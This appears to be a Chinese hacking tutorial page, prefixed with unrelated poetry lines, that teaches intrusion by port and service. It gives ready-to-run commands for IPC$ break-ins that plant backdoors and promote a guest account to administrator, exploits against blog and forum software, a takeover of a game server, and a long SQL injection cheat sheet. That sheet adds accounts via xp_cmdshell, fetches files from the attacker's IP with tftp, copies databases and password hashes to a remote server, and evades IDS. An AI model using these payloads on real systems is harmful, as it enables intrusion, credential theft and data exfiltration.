幾種端口入侵及軟件選擇應(yīng)用

幾種端口入侵及軟件選擇應(yīng)用!蜀道之難，難于上青天。從善如登，從惡如崩。文章本天成，妙手偶得之。莫等閑，白了少年頭，空悲切。剪不斷，理還亂，是離愁，別是一番滋味在心頭。1.1433端口入侵scanport.exe查有1433的機(jī)器SQLScanPas*.**e進(jìn)行字典暴破（字典是關(guān)鍵）最后SQLTool*.**e入侵對sql的sp2及以下的系統(tǒng)，可用sql的hello溢出漏洞入侵。nc-vv-l-p本機(jī)端口sqlhelloF.exe入侵ip1433本機(jī)ip本機(jī)端口（以上反向的，測試成功）sqlhelloz.exe入侵ip1433（這個是正向連接）2.4899端口入侵用4899過濾器.exe，掃描空口令的機(jī)器3.3899的入侵對很早的機(jī)器，可以試試3389的溢出(win3389ex.exe)對2000的機(jī)器，可以試試字典暴破。(tscrack.exe)4.80入侵對sp3以前的機(jī)器，可以用webdav入侵；對bbs論壇，可以試試上傳漏洞（upfile.exe或dvup_delphi.exe）可以利用SQL進(jìn)行注入。（啊D的注入軟件）。5.serv-u入侵(21端口）對5.004及以下系統(tǒng)，可用溢出入侵。（serv5004.exe）對及以下系統(tǒng)，可用本地提升權(quán)限。（servlocal.exe）對serv-u的MD5加密密碼，可以用字典暴破。（crack.vbs）輸入一個被serv-u加密的密碼（34位長），通過與字典檔（dict.txt）的比較，得到密碼6.554端口用real554.exe入侵。7.6129端口用DameWare6129.exe入侵。8.系統(tǒng)漏洞利用135、445端口，用ms03026、ms03039、ms03049、ms04011漏洞，進(jìn)行溢出入侵。9.3127等端口可以利用doom病毒開的端口，用nodoom.exe入侵。（可用mydoomscan.exe查）。10.其他入侵利用shanlu的入侵軟件入侵（WINNTAutoAttack.exe）。經(jīng)典IPC$入侵1.C:\>netuse\\\IPC$""/user:"admintitrators"這是用"流光"掃到的用戶名是administrators，密碼為"空"的IP地址(氣好到家如果是打算攻擊的話，就可以用這樣的命令來與建立一個連接，因為密碼為"空"，所以第一個引號處就不用輸入，后面一個雙引號里的是用戶名，輸入administrators，命令即可成功完成。2.C:\>copysrv.exe\\\admin$先復(fù)制srv.exe上去，在流光的Tools目錄下就有（這里的$是指admin用戶的c:\winnt\system32\，大家還可以使用c$、d$，意思是C盤與D盤，這看你要復(fù)制到什么地方去了）。3.C:\>nettime\\查查時間，發(fā)現(xiàn)的當(dāng)前時間是2002/3/19上午11:00，命令成功完成。4.C:\>at\\11:05srv.exe用at命令啟動srv.exe吧（這里設(shè)置的時間要比主機(jī)時間快，不然你怎么啟動啊.5.C:\>nettime\\再查查到時間沒有？如果的當(dāng)前時間是2002/3/19上午11:05，那就準(zhǔn)備開始下面的命令。6.C:\>telnet99這里會用到Telnet命令吧，注意端口是99。Telnet默認(rèn)的是23端口，但是我們使用的是SRV在對方計算機(jī)中為我們建立一個99端口的Shell。雖然我們可以Telnet上去了，但是SRV是一次性的，下次登錄還要再激活！所以我們打算建立一個Telnet服務(wù)！這就要用到ntlm了7.C:\>copyntlm.exe\\\admin$用Copy命令把ntlm.exe上傳到主機(jī)上（ntlm.exe也是在《流光》的Tools目錄中）。8.C:\WINNT\system32>ntlm輸入ntlm啟動（這里的C:\WINNT\system32>指的是對方計算機(jī)，運行ntlm其實是讓這個程序在對方計算機(jī)上運行）。當(dāng)出現(xiàn)"DONE"的時候，就說明已經(jīng)啟動正常。然后使用"netstarttelnet"來開啟Telnet服務(wù)！9.Telnet，接著輸入用戶名與密碼就進(jìn)入對方了，*作就像在DOS上*作一樣簡單！(然后你想做什么?想做什么就做什么吧,哈哈)為了以防萬一,我們再把guest激活加到管理組10.C:\>netuserguest/active:yes將對方的Guest用戶激活11.C:\>netuserguest1234將Guest的密碼改為1234,或者你要設(shè)定的密碼12.C:\>netlocalgroupadministratorsguest/add將Guest變?yōu)锳dministrator^_^(如果管理員密碼更改，guest帳號沒改變的話，下次我們可以用guest再次訪問這臺計算機(jī))源碼利用一些網(wǎng)站用的都是網(wǎng)上下載的源碼.有的站長很菜.什么也不改.EY:/xiaoyoulu/index.asp這個站用的是：杰出校友錄，源碼我下過了，默認(rèn)數(shù)據(jù)庫/webshell路徑：\database\liangu_data.mdb后臺管理：adm_login.asp密碼及用戶名都是admin312.搜索引擎利用:(1).inurl:flasher_list.asp默認(rèn)數(shù)據(jù)庫:database/flash.mdb后臺/manager/(2).找網(wǎng)站的管理后臺地址:site:intext:管理site:intitle:管理〈關(guān)鍵字很多，自已找〉site:inurl:login(3).查找access的數(shù)據(jù)庫,mssql、mysql的連接文件allinurl:bbsdatafiletype:mdbinurl:databasefiletype:incconninurl:datafiletype:mdb我主不做了。。自已做做吧。。幾種攻擊應(yīng)用第一步，搜索攻擊目標(biāo)打開搜索引擎，搜索“PragrambyDlog”，可以找到許多博客頁面，這些博客都是使用“Dlog破廢墟修改版”建立的。我們要找的葉面是存在暴庫漏洞的1.2版本。許多用戶都忽視了這個版本中內(nèi)嵌的eWebEditor在線編輯數(shù)據(jù)庫的安全性，致使黑客可以使用默認(rèn)的路徑進(jìn)行下載。第二步，獲取管理員密碼在搜索結(jié)果列表中挑一個攻擊目標(biāo)：http://s*.8888.com/blog/，用瀏覽器打開這個地址，在后面加上eWebEditor/db/e/eWebEditor.mdb并回車，下載數(shù)據(jù)庫。打開這個數(shù)據(jù)庫，在數(shù)據(jù)庫的“eWebEditor_system”列中可以看到管理員的用戶名和密碼。由于密碼都是經(jīng)過MD5加密的，因此找一個MD5密碼暴力破解器計算機(jī)分鐘或幾天，就可得到密碼。不過據(jù)經(jīng)驗，只要能下載這個數(shù)據(jù)庫，就說明管理員極有可能沒有更改默認(rèn)的登陸密碼，如果看到MD5密碼為“7a57a5a743894a0e”，那么密碼就是默認(rèn)的“admin”?，F(xiàn)在，我們可以進(jìn)入eWebEditor后臺在線編輯頁面了。第三步，控制服務(wù)器在博客的地址后加上“eWebEditor/admin_login.asp”即可打開eWebEditor后臺在線編輯頁面。輸入默認(rèn)的用戶名和密碼“admin”即可順利登陸博客的后臺管理頁面。新添加一個博客樣式，返回樣式管理頁面。在樣式列表中找到剛才添加的樣式，并點擊樣式名后的“設(shè)置”按鈕，就可使用新的博客樣式。退出管理頁面后進(jìn)行注冊并登陸博客，然后發(fā)一篇帖子并選擇上傳文件，此時我們可以上傳ASP木馬以便控制整個服務(wù)器。漏洞二：文件上傳漏洞第一步，搜索存在漏洞的博客找到任意一個目標(biāo)后，首先要測試博客管理員是否將上傳網(wǎng)頁程序文件刪除了，如果用戶有一些安全意識，有可能會將默認(rèn)的上傳網(wǎng)頁文件刪除掉，這時就不行了。我們選“/workingbird”,在地址后添加“/upfile.asp”后回車，如果看到的提示信息為“MicrosoftVBScript運行時錯誤錯誤‘800a01b6’”之類的信息，表示該博客網(wǎng)站存在著文件上傳漏洞。第二步，展開攻擊運行“網(wǎng)站上傳利用工具”，在“提交地址”中輸入upfile.asp上傳文件的所在地址，然后在“上傳路徑”中指定上傳木馬文件后的保存路徑，我們一般將它保存在網(wǎng)站根目錄下?！奥窂阶侄巍焙汀拔募侄巍笔褂媚J(rèn)的設(shè)置就可以了，在“允許類型”中輸入博客系統(tǒng)允許上傳的圖片類型。在“本地文件”后點擊“瀏覽”選擇本地的一個ASP木馬，可以選擇海洋頂端網(wǎng)木馬?，F(xiàn)在點擊“提交”按鈕，即可上傳木馬，如果看到信息“1filehadbeenuploaded!”，則表示文件上傳成功。接下來，我們就可以連接上傳后的ASP木馬進(jìn)一步滲透攻擊，達(dá)到控制整個網(wǎng)站服務(wù)器的目的。漏洞三：SQL注入漏洞第一步，掃描博客中的注入漏洞以博客“http://202.112.*.***/dlog/”作為目標(biāo)?？梢允褂霉ぞ撸ㄈ鏝BSI2SQL自動注入攻擊器）進(jìn)行SQL注入。運行程序，點擊工具欄中的“網(wǎng)站掃描”，在“網(wǎng)站地址”中輸入博客網(wǎng)址，勾選“全面掃描”項，點擊“掃描”后，就可以對博客網(wǎng)站中存在的所有注入漏洞進(jìn)行掃描。第二步，開始攻擊在掃描結(jié)果列表中任意選一個目標(biāo)“http://202.112.*.***/dlog/showlog.asp?log_id=402”，然后點擊界面下方的“注入分析”進(jìn)入“注入攻擊”頁面。點擊“檢測”按鈕，結(jié)果顯示“贊為監(jiān)測到注入漏洞”！不要緊，我們用1=1檢測法。在注入瀏覽器地址欄中的末尾分別加上“and1=1”和“and2=2”，查看兩者返回頁面的信息中有什么不同。并記下在“and1=1”頁面中出現(xiàn)過，但是在“and2=2”中未出現(xiàn)過的字符串，并將其輸入NBSI2界面的“特征字符串”?，F(xiàn)在點擊“再檢測”，很快就可看到注入檢測的結(jié)果。由于數(shù)據(jù)庫是Access數(shù)據(jù)庫，所以程序會自動猜解數(shù)據(jù)庫中的表名和列名，點擊窗口中的“自動猜解”，即可猜測可能存在的數(shù)據(jù)庫表名，默認(rèn)的表名為“user_mdb”。再利用自動猜解得到表中的列名等數(shù)據(jù)信息。然后自動猜解表中的用戶數(shù)據(jù)，從而得到管理員的MD5加秘密碼。最后使用MD5密碼破解工具暴力破解，登陸后臺管理頁面，成功入侵。漏洞四：cookies欺騙漏洞第一步，搜索目標(biāo)搜索關(guān)鍵詞“PoweredbyL-Blog”，選擇“http://***.*****.***/blog”作為攻擊目標(biāo)。第二步，查詢cookies信息這里要用到一款可以修改cookies信息的工具。打開程序，輸入博客網(wǎng)站的地址并登陸，查看當(dāng)前的cookies信息，其中包含了我們的登陸用戶名和密碼等信息。第三步，“欺騙”攻擊現(xiàn)在要對cookies信息進(jìn)行修改，欺騙博客程序，使它以為登陸用戶的身份是管理員。此時可直接對cookies信息進(jìn)行修改。我們只修改“menStatus=SupAdmin”，其它內(nèi)容保留，然后繼續(xù)保持工具欄中的“鎖”為按下狀態(tài)?，F(xiàn)在，退出當(dāng)前的用戶登陸狀態(tài)，重新打開該博客首頁。此時會顯示我們沒有登陸，然而我們已經(jīng)擁有了管理員的權(quán)限。后記：博客是一個聯(lián)系入侵供給的好戰(zhàn)場，也提醒博客應(yīng)加強(qiáng)安全意識。暴庫入侵搜索：poweredbyOBlog暴庫示例：http://***/blog/index.asp?classid=3將以上連接中的最后一個正斜杠"/"改為"%5c"http://***/blog%5cindex.asp?classid=36>入侵私服的方法這個教程雖然可能有人會看不懂但是只要多看幾遍就會懂的.入侵傳奇私服/充當(dāng)非法GM首先，我得聲明,我寫本文并不是教大家如何去黑4f，只是想以本文引起廣大4f擁有者的注意，提高自己的網(wǎng)管水平。我愛玩游戲，但卻玩得很菜，也沒有時間去玩，只想玩著過癮，所以，當(dāng)我開始玩?zhèn)髌鏁r，雖覺得是好玩，但玩盛大的簡直是在受罪，升級慢，沒好裝備，處處受人欺負(fù)。所以，4f是明智的選擇，但進(jìn)去時也沒有好裝備，也是受人欺負(fù)，難道我不可以做gm？試試，follingme！找來一大堆4f的ip，開個x-scan掃吧。有了，還真不少，都是弱口令的，這些網(wǎng)管真菜呀。選好一個，,go！打開cmd，1）c:/>netuseipc$""/user:administrator連接成功，ok，連上了，成功在望，2）c:/>copyd$mirservermir200enviradminlist.txt系統(tǒng)找不到指定的文件。沒有？不可能吧？唔，一定是隱藏了，沒關(guān)系，再來，3）c:>attrib-r-hd$mirservermir200enviradminlist.txt沒有提示，成功了，這次連復(fù)制也不用了，直接改吧，4）c:>editd$mirservermir200enviradminlist.txt會打開個介面，看看里面有哪些gm，加個吧，自己記得就行了，改完保存退出5）c:>attrib+r+hd$mirservermir200enviradminlist.txt把a(bǔ)dminilist.txt還原成只讀隱藏，好了，大功告成，快打掃腳印吧，別讓人發(fā)現(xiàn)被入侵了，現(xiàn)在，就等著系統(tǒng)重啟了，等不及的話就在第五步讓它重啟，不過這樣太危險了，還是等吧第二天注冊個帳號，新建個之前加的人名進(jìn)去，/who當(dāng)前150人在線哈，我就是gm了。趕快把自己升級，@level-1升級成功，255級，哈哈再造出想要的裝備，想要什么盡情造吧，重復(fù)上面的把自己從adminlist.txt里刪了，哈哈，好裝備到手了，可以玩了獲得動網(wǎng)前臺管理員后暴log日志的方法前陣看到llikz的一個大作，獲得動網(wǎng)前臺管理員后暴log日志的方法。文章題目是《夏日動網(wǎng)“洞”不斷》，呵呵，大家網(wǎng)絡(luò)自行搜索。recycle.asp?tablename=Dv_bbs1%20union%20select%201,1,l_content,1,1,1%20from%20dv_log%20where%20l_id=5%20union%20select%201,1,1,1,1,1%20from%20dv_bbs1然后網(wǎng)絡(luò)上出現(xiàn)了暴出全部日志的語句，真的棒極了。recycle.asp?tablename=Dv_bbs1%20union%20select%201,1,l_content,1,1,1%20from%20dv_log%20where%20l_announceid=0%20union%20select%201,1,1,1,1,1%20from%20dv_bbs1關(guān)于使用方法不多啰唆咯，網(wǎng)絡(luò)上實在太多。然后在我一次拿帳號的過程中發(fā)現(xiàn)有個站的日志全被清空了，比較郁悶，于是修改了一下暴字段內(nèi)容的語句，帖出來方便下不熟悉的朋友暴前臺所有用戶：recycle.asp?tablename=dv_bbs1%20union%20select%201,2,username,userpassword,5,6%20from%20dv_user%20where%20userid>0%20union%20select%201,1,1,1,1,1%20from%20dv_bbs1暴后臺所有用戶：recycle.asp?tablename=dv_bbs1%20union%20select%201,2,username,password,5,6%20from%20dv_user%20where%20l_id>0%20union%20select%201,1,1,1,1,1%20from%20dv_bbs1判斷有無注入點判斷有無注入點';and1=1and1=22.猜表:常見的表:adminadminuseruserpasspassword等..and0<>(selectcount(*)from*)and0<>(selectcount(*)fromadmin)---判斷是否存在admin這張表3.猜帳號數(shù)目如果遇到0<返回正確頁面1<返回錯誤頁面說明帳號數(shù)目就是1個and0<(selectcount(*)fromadmin)and1<(selectcount(*)fromadmin)4.猜解字段名稱在len()括號里面加上我們想到的字段名稱.and1=(selectcount(*)fromadminwherelen(*)>0)--and1=(selectcount(*)fromadminwherelen(用戶字段名稱name)>0)and1=(selectcount(*)fromadminwherelen(_blank>密碼字段名稱password)>0)5.猜解各個字段的長度猜解長度就是把>0變換直到返回正確頁面為止and1=(selectcount(*)fromadminwherelen(*)>0)and1=(selectcount(*)fromadminwherelen(name)>6)錯誤and1=(selectcount(*)fromadminwherelen(name)>5)正確長度是6and1=(selectcount(*)fromadminwherelen(name)=6)正確and1=(selectcount(*)fromadminwherelen(password)>11)正確and1=(selectcount(*)fromadminwherelen(password)>12)錯誤長度是12and1=(selectcount(*)fromadminwherelen(password)=12)正確6.猜解字符and1=(selectcount(*)fromadminwhereleft(name,1)=a)---猜解用戶帳號的第一位and1=(selectcount(*)fromadminwhereleft(name,2)=ab)---猜解用戶帳號的第二位就這樣一次加一個字符這樣猜,猜到夠你剛才猜出來的多少位了就對了,帳號就算出來了and1=(selecttop1count(*)fromAdminwhereAsc(mid(pass,5,1))=51)--這個查詢語句可以猜解中文的用戶和_blank>密碼.只要把后面的數(shù)字換成中文的ASSIC碼就OK.最后把結(jié)果再轉(zhuǎn)換成字符.groupbyusers.idhaving1=1--groupbyusers.id,users.username,users.password,users.privshaving1=1--;insertintousersvalues(666,attacker,foobar,0xffff)--UNIONSELECTTOP1COLUMN_blank>_NAMEFROMINFORMATION_blank>_SCHEMA.COLUMNSWHERETABLE_blank>_NAME=logintable-UNIONSELECTTOP1COLUMN_blank>_NAMEFROMINFORMATION_blank>_SCHEMA.COLUMNSWHERETABLE_blank>_NAME=logintableWHERECOLUMN_blank>_NAMENOTIN(login_blank>_id)-UNIONSELECTTOP1COLUMN_blank>_NAMEFROMINFORMATION_blank>_SCHEMA.COLUMNSWHERETABLE_blank>_NAME=logintableWHERECOLUMN_blank>_NAMENOTIN(login_blank>_id,login_blank>_name)-UNIONSELECTTOP1login_blank>_nameFROMlogintable-UNIONSELECTTOP1passwordFROMlogintablewherelogin_blank>_name=Rahul--看_blank>服務(wù)器打的補(bǔ)丁=出錯了打了SP4補(bǔ)丁and1=(select@@VERSION)--看_blank>數(shù)據(jù)庫連接賬號的權(quán)限，返回正常，證明是_blank>服務(wù)器角色sysadmin權(quán)限。and1=(SELECTIS_blank>_SRVROLEMEMBER(sysadmin))--判斷連接_blank>數(shù)據(jù)庫帳號。（采用SA賬號連接返回正常=證明了連接賬號是SA）andsa=(SELECTSystem_blank>_user)--anduser_blank>_name()=dbo--and0<>(selectuser_blank>_name()--看xp_blank>_cmdshell是否刪除and1=(SELECTcount(*)FROMmaster.dbo.sysobjectsWHERExtype=XANDname=xp_blank>_cmdshell)--xp_blank>_cmdshell被刪除，恢復(fù),支持絕對路徑的恢復(fù);EXECmaster.dbo.sp_blank>_addextendedprocxp_blank>_cmdshell,xplog70.dll--;EXECmaster.dbo.sp_blank>_addextendedprocxp_blank>_cmdshell,c:\inetpub\wwwroot\xplog70.dll--反向PING自己實驗;usemaster;declare@sint;execsp_blank>_oacreate"wscript.shell",@sout;execsp_blank>_oamethod@s,"run",NULL,"cmd.exe/cping";--加帳號;DECLARE@shellINTEXECSP_blank>_OACREATEwscript.shell,@shellOUTPUTEXECSP_blank>_OAMETHOD@shell,run,null,C:\WINNT\system32\cmd.exe/cnetuserjiaoniang$1866574/add--創(chuàng)建一個虛擬目錄E盤：;declare@ointexecsp_blank>_oacreatewscript.shell,@ooutexecsp_blank>_oamethod@o,run,NULL,cscript.exec：\inetpub\wwwroot\mkwebdir.vbs-w"默認(rèn)Web站點"-v"e","e：\"--訪問屬性：（配合寫入一個webshell）declare@ointexecsp_blank>_oacreatewscript.shell,@ooutexecsp_blank>_oamethod@o,run,NULL,cscript.exec：\inetpub\wwwroot\chaccess.vbs-aw3svc/1/ROOT/e+browse爆庫特殊_blank>技巧：:%5c=\或者把/和\修改%5提交and0<>(selecttop1pathsfromnewtable)--得到庫名（從1到5都是系統(tǒng)的id，6以上才可以判斷）and1=(selectnamefrommaster.dbo.sysdatabaseswheredbid=7)--and0<>(selectcount(*)frommaster.dbo.sysdatabaseswherename>1anddbid=6)依次提交dbid=7,8,9....得到更多的_blank>數(shù)據(jù)庫名and0<>(selecttop1namefrombbs.dbo.sysobjectswherextype=U)暴到一個表假設(shè)為adminand0<>(selecttop1namefrombbs.dbo.sysobjectswherextype=Uandnamenotin(Admin))來得到其他的表。and0<>(selectcount(*)frombbs.dbo.sysobjectswherextype=Uandname=adminanduid>(str(id)))暴到UID的數(shù)值假設(shè)為18779569uid=idand0<>(selecttop1namefrombbs.dbo.syscolumnswhereid=18779569)得到一個admin的一個字段,假設(shè)為user_blank>_idand0<>(selecttop1namefrombbs.dbo.syscolumnswhereid=18779569andnamenotin(id,...))來暴出其他的字段and0<(selectuser_blank>_idfromBBS.dbo.adminwhereusername>1)可以得到用戶名依次可以得到_blank>密碼。。。。。假設(shè)存在user_blank>_idusername,password等字段and0<>(selectcount(*)frommaster.dbo.sysdatabaseswherename>1anddbid=6)and0<>(selecttop1namefrombbs.dbo.sysobjectswherextype=U)得到表名and0<>(selecttop1namefrombbs.dbo.sysobjectswherextype=Uandnamenotin(Address))and0<>(selectcount(*)frombbs.dbo.sysobjectswherextype=Uandname=adminanduid>(str(id)))判斷id值and0<>(selecttop1namefromBBS.dbo.syscolumnswhereid=773577794)所有字段?id=-1unionselect1,2,3,4,5,6,7,8,9,10,11,12,13,*fromadmin?id=-1unionselect1,2,3,4,5,6,7,8,*,9,10,11,12,13fromadmin(union，access也好用)得到WEB路徑;createtable[dbo].[swap]([swappass][char](255));--and(selecttop1swappassfromswap)=1--;CREATETABLEnewtable(idintIDENTITY(1,1),pathsvarchar(500))Declare@testvarchar(20)execmaster..xp_blank>_regread@rootkey=HKEY_blank>_LOCAL_blank>_MACHINE,@key=SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\VirtualRoots\,@value_blank>_name=/,values=@testOUTPUTinsertintopaths(path)values(@test)--;useku1;--;createtablecmd(strimage);--建立image類型的表cmd存在xp_blank>_cmdshell的測試過程：;execmaster..xp_blank>_cmdshelldir;execmaster.dbo.sp_blank>_addloginjiaoniang$;--加SQL帳號;execmaster.dbo.sp_blank>_passwordnull,jiaoniang$,1866574;--;execmaster.dbo.sp_blank>_addsrvrolememberjiaoniang$sysadmin;--;execmaster.dbo.xp_blank>_cmdshellnetuserjiaoniang$1866574/workstations:*/times:all/passwordchg:yes/passwordreq:yes/active:yes/add;--;execmaster.dbo.xp_blank>_cmdshellnetlocalgroupadministratorsjiaoniang$/add;--execmaster..xp_blank>_servicecontrolstart,schedule啟動_blank>服務(wù)execmaster..xp_blank>_servicecontrolstart,server;DECLARE@shellINTEXECSP_blank>_OACREATEwscript.shell,@shellOUTPUTEXECSP_blank>_OAMETHOD@shell,run,null,C：\WINNT\system32\cmd.exe/cnetuserjiaoniang$1866574/add;DECLARE@shellINTEXECSP_blank>_OACREATEwscript.shell,@shellOUTPUTEXECSP_blank>_OAMETHOD@shell,run,null,C：\WINNT\system32\cmd.exe/cnetlocalgroupadministratorsjiaoniang$/add;execmaster..xp_blank>_cmdshelltftp-iyouipgetfile.exe--利用TFTP上傳文件;declare@asysnameset@a=xp_blank>_+cmdshellexec@adirc:\;declare@asysnameset@a=xp+_blank>_cm’+’dshellexec@adirc:\;declare@a;set@a=db_blank>_name();backupdatabase@atodisk=你的IP你的共享目錄bak.dat如果被限制則可以。select*fromopenrowset(_blank>sqloledb,server;sa;,selectOK!execmaster.dbo.sp_blank>_addloginhax)查詢構(gòu)造：SELECT*FROMnewsWHEREid=...ANDtopic=...AND.....adminand1=(selectcount(*)from[user]whereusername=victimandright(left(userpass,01),1)=1)anduserpass<>select123;--;usemaster;--:aornamelikefff%;--顯示有一個叫ffff的用戶哈。and1<>(selectcount(email)from[user]);--;update[users]setemail=(selecttop1namefromsysobjectswherextype=uandstatus>0)wherename=ffff;--;update[users]setemail=(selecttop1idfromsysobjectswherextype=uandname=ad)wherename=ffff;--;update[users]setemail=(selecttop1namefromsysobjectswherextype=uandid>581577110)wherename=ffff;--;update[users]setemail=(selecttop1count(id)frompassword)wherename=ffff;--;update[users]setemail=(selecttop1pwdfrompasswordwhereid=2)wherename=ffff;--;update[users]setemail=(selecttop1namefrompasswordwhereid=2)wherename=ffff;--上面的語句是得到_blank>數(shù)據(jù)庫中的第一個用戶表,并把表名放在ffff用戶的郵箱字段中。通過查看ffff的用戶資料可得第一個用表叫ad然后根據(jù)表名ad得到這個表的ID得到第二個表的名字insertintousersvalues(666,char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73),char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73),0xffff)--insertintousersvalues(667,123,123,0xffff)--insertintousersvalues(123,admin--,password,0xffff)--;anduser>0;and(selectcount(*)fromsysobjects)>0;and(selectcount(*)frommysysobjects)>0//為access_blank>數(shù)據(jù)庫枚舉出數(shù)據(jù)表名;updateaaasetaaa=(selecttop1namefromsysobjectswherextype=uandstatus>0);--這是將第一個表名更新到aaa的字段處。讀出第一個表，第二個表可以這樣讀出來（在條件后加上andname<>剛才得到的表名）。;updateaaasetaaa=(selecttop1namefromsysobjectswherextype=uandstatus>0andname<>vote);--然后id=1552andexists(select*fromaaawhereaaa>5)讀出第二個表，一個個的讀出，直到?jīng)]有為止。讀字段是這樣：;updateaaasetaaa=(selecttop1col_blank>_name(object_blank>_id(表名),1));--然后id=152andexists(select*fromaaawhereaaa>5)出錯，得到字段名;updateaaasetaaa=(selecttop1col_blank>_name(object_blank>_id(表名),2));--然后id=152andexists(select*fromaaawhereaaa>5)出錯，得到字段名[獲得數(shù)據(jù)表名][將字段值更新為表名，再想法讀出這個字段的值就可得到表名]update表名set字段=(selecttop1namefromsysobjectswherextype=uandstatus>0[andname<>你得到的表名查出一個加一個])[where條件]selecttop1namefromsysobjectswherextype=uandstatus>0andnamenotin(table1,table2,…)通過SQLSERVER注入_blank>漏洞建_blank>數(shù)據(jù)庫管理員帳號和系統(tǒng)管理員帳號[當(dāng)前帳號必須是SYSADMIN組][獲得數(shù)據(jù)表字段名][將字段值更新為字段名，再想法讀出這個字段的值就可得到字段名]update表名set字段=(selecttop1col_blank>_name(object_blank>_id(要查詢的數(shù)據(jù)表名),字段列如:1)[where條件]繞過IDS的檢測[使用變量];declare@asysnameset@a=xp_blank>_+cmdshellexec@adirc:\;declare@asysnameset@a=xp+_blank>_cm’+’dshellexec@adirc:\1、開啟遠(yuǎn)程_blank>數(shù)據(jù)庫基本語法select*fromOPENROWSET(SQLOLEDB,server=servername;uid=sa;pwd=123,select*fromtable1)參數(shù):(1)OLEDBProvidername2、其中連接字符串參數(shù)可以是任何端口用來連接,比如select*fromOPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=,1433;,select*fromtable3.復(fù)制目標(biāo)主機(jī)的整個_blank>數(shù)據(jù)庫insert所有遠(yuǎn)程表到本地表。基本語法：insertintoOPENROWSET(SQLOLEDB,server=servername;uid=sa;pwd=123,select*fromtable1)select*fromtable2這行語句將目標(biāo)主機(jī)上table2表中的所有數(shù)據(jù)復(fù)制到遠(yuǎn)程_blank>數(shù)據(jù)庫中的table1表中。實際運用中適當(dāng)修改連接字符串的IP地址和端口，指向需要的地方，比如：insertintoOPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=,1433;,select*fromtable1)select*fromtable2insertintoOPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=,1433;,select*from_blank>_sysdatabases)select*frommaster.dbo.sysdatabasesinsertintoOPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=,1433;,select*from_blank>_sysobjects)select*fromuser_blank>_database.dbo.sysobjectsinsertintoOPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=,1433;,select*from_blank>_syscolumns)select*fromuser_blank>_database.dbo.syscolumns復(fù)制_blank>數(shù)據(jù)庫：insertintoOPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=,1433;,select*fromtable1)select*fromdatabase..table1insertintoOPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=,1433;,select*fromtable2)select*fromdatabase..table2復(fù)制哈西表（HASH）登錄_blank>密碼的hash存儲于sysxlogins中。方法如下：insertintoOPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=,1433;,select*from_blank>_sysxlogins)select*fromdatabase.dbo.sysxlogins得到hash之后，就可以進(jìn)行暴力破解。遍歷目錄的方法：先創(chuàng)建一個臨時表：temp;createtabletemp(idnvarchar(255),num1nvarchar(255),num2nvarchar(255),num3nvarchar(255));--;inserttempexecmaster.dbo.xp_blank>_availablemedia;--獲得當(dāng)前所有驅(qū)動器;insertintotemp(id)execmaster.dbo.xp_blank>_subdirsc:\;--獲得子目錄列表;insertintotemp(id,num1)execmaster.dbo.xp_blank>_dirtreec:\;--獲得所有子目錄的目錄樹結(jié)構(gòu),并寸入temp表中;insertintotemp(id)execmaster.dbo.xp_blank>_cmdshelltypec:\web\index.asp;--查看某個文件的內(nèi)容;insertintotemp(id)execmaster.dbo.xp_blank>_cmdshelldirc:\;--;insertintotemp(id)execmaster.dbo.xp_blank>_cmdshelldirc:\*.asp/s/a;--;insertintotemp(id)execmaster.dbo.xp_blank>_cmdshellcscriptC:\Inetpub\AdminScripts\adsutil.vbsenumw3svc;insertintotemp(id,num1)execmaster.dbo.xp_blank>_dirtreec:\;--（xp_blank>_dirtree適用權(quán)限PUBLIC）寫入表：語句1：and1=(SELECTIS_blank>_SRVROLEMEMBER(sysadmin));--語句2：and1=(SELECTIS_blank>_SRVROLEMEMBER(serveradmin));--語句3：and1=(SELECTIS_blank>_SRVROLEMEMBER(setupadmin));--語句4：and1=(SELECTIS_blank>_SRVROLEMEMBER(securityadmin));--語句5：and1=(SELECTIS_blank>_SRVROLEMEMBER(securityadmin));--語句6：and1=(SELECTIS_blank>_SRVROLEMEMBER(diskadmin));--語句7：and1=(SELECTIS_blank>_SRVROLEMEMBER(bulkadmin));--語句8：and1=(SELECTIS_blank>_SRVROLEMEMBER(bulkadmin));--語句9：and1=(SELECTIS_blank>_MEMBER(db_blank>_owner));--把路徑寫到表中去：;createtabledirs(pathsvarchar(100),idint)--;insertdirsexecmaster.dbo.xp_blank>_dirtreec:\--and0<>(selecttop1pathsfromdirs)--and0<>(selecttop1pathsfromdirswherepathsnotin(@Inetpub))--;createtabledirs1(pathsvarchar(100),idint)--;insertdirsexecmaster.dbo.xp_blank>_dirtreee:\web--and0<>(selecttop1pathsfromdirs1)--把_blank>數(shù)據(jù)庫備份到網(wǎng)頁目錄：下載;declare@asysname;set@a=db_blank>_name();backupdatabase@atodisk=e:\web\down.bak;--and1=(Selecttop1namefrom(Selecttop12id,namefromsysobjectswherextype=char(85))Torderbyiddesc)and1=(SelectTop1col_blank>_name(object_blank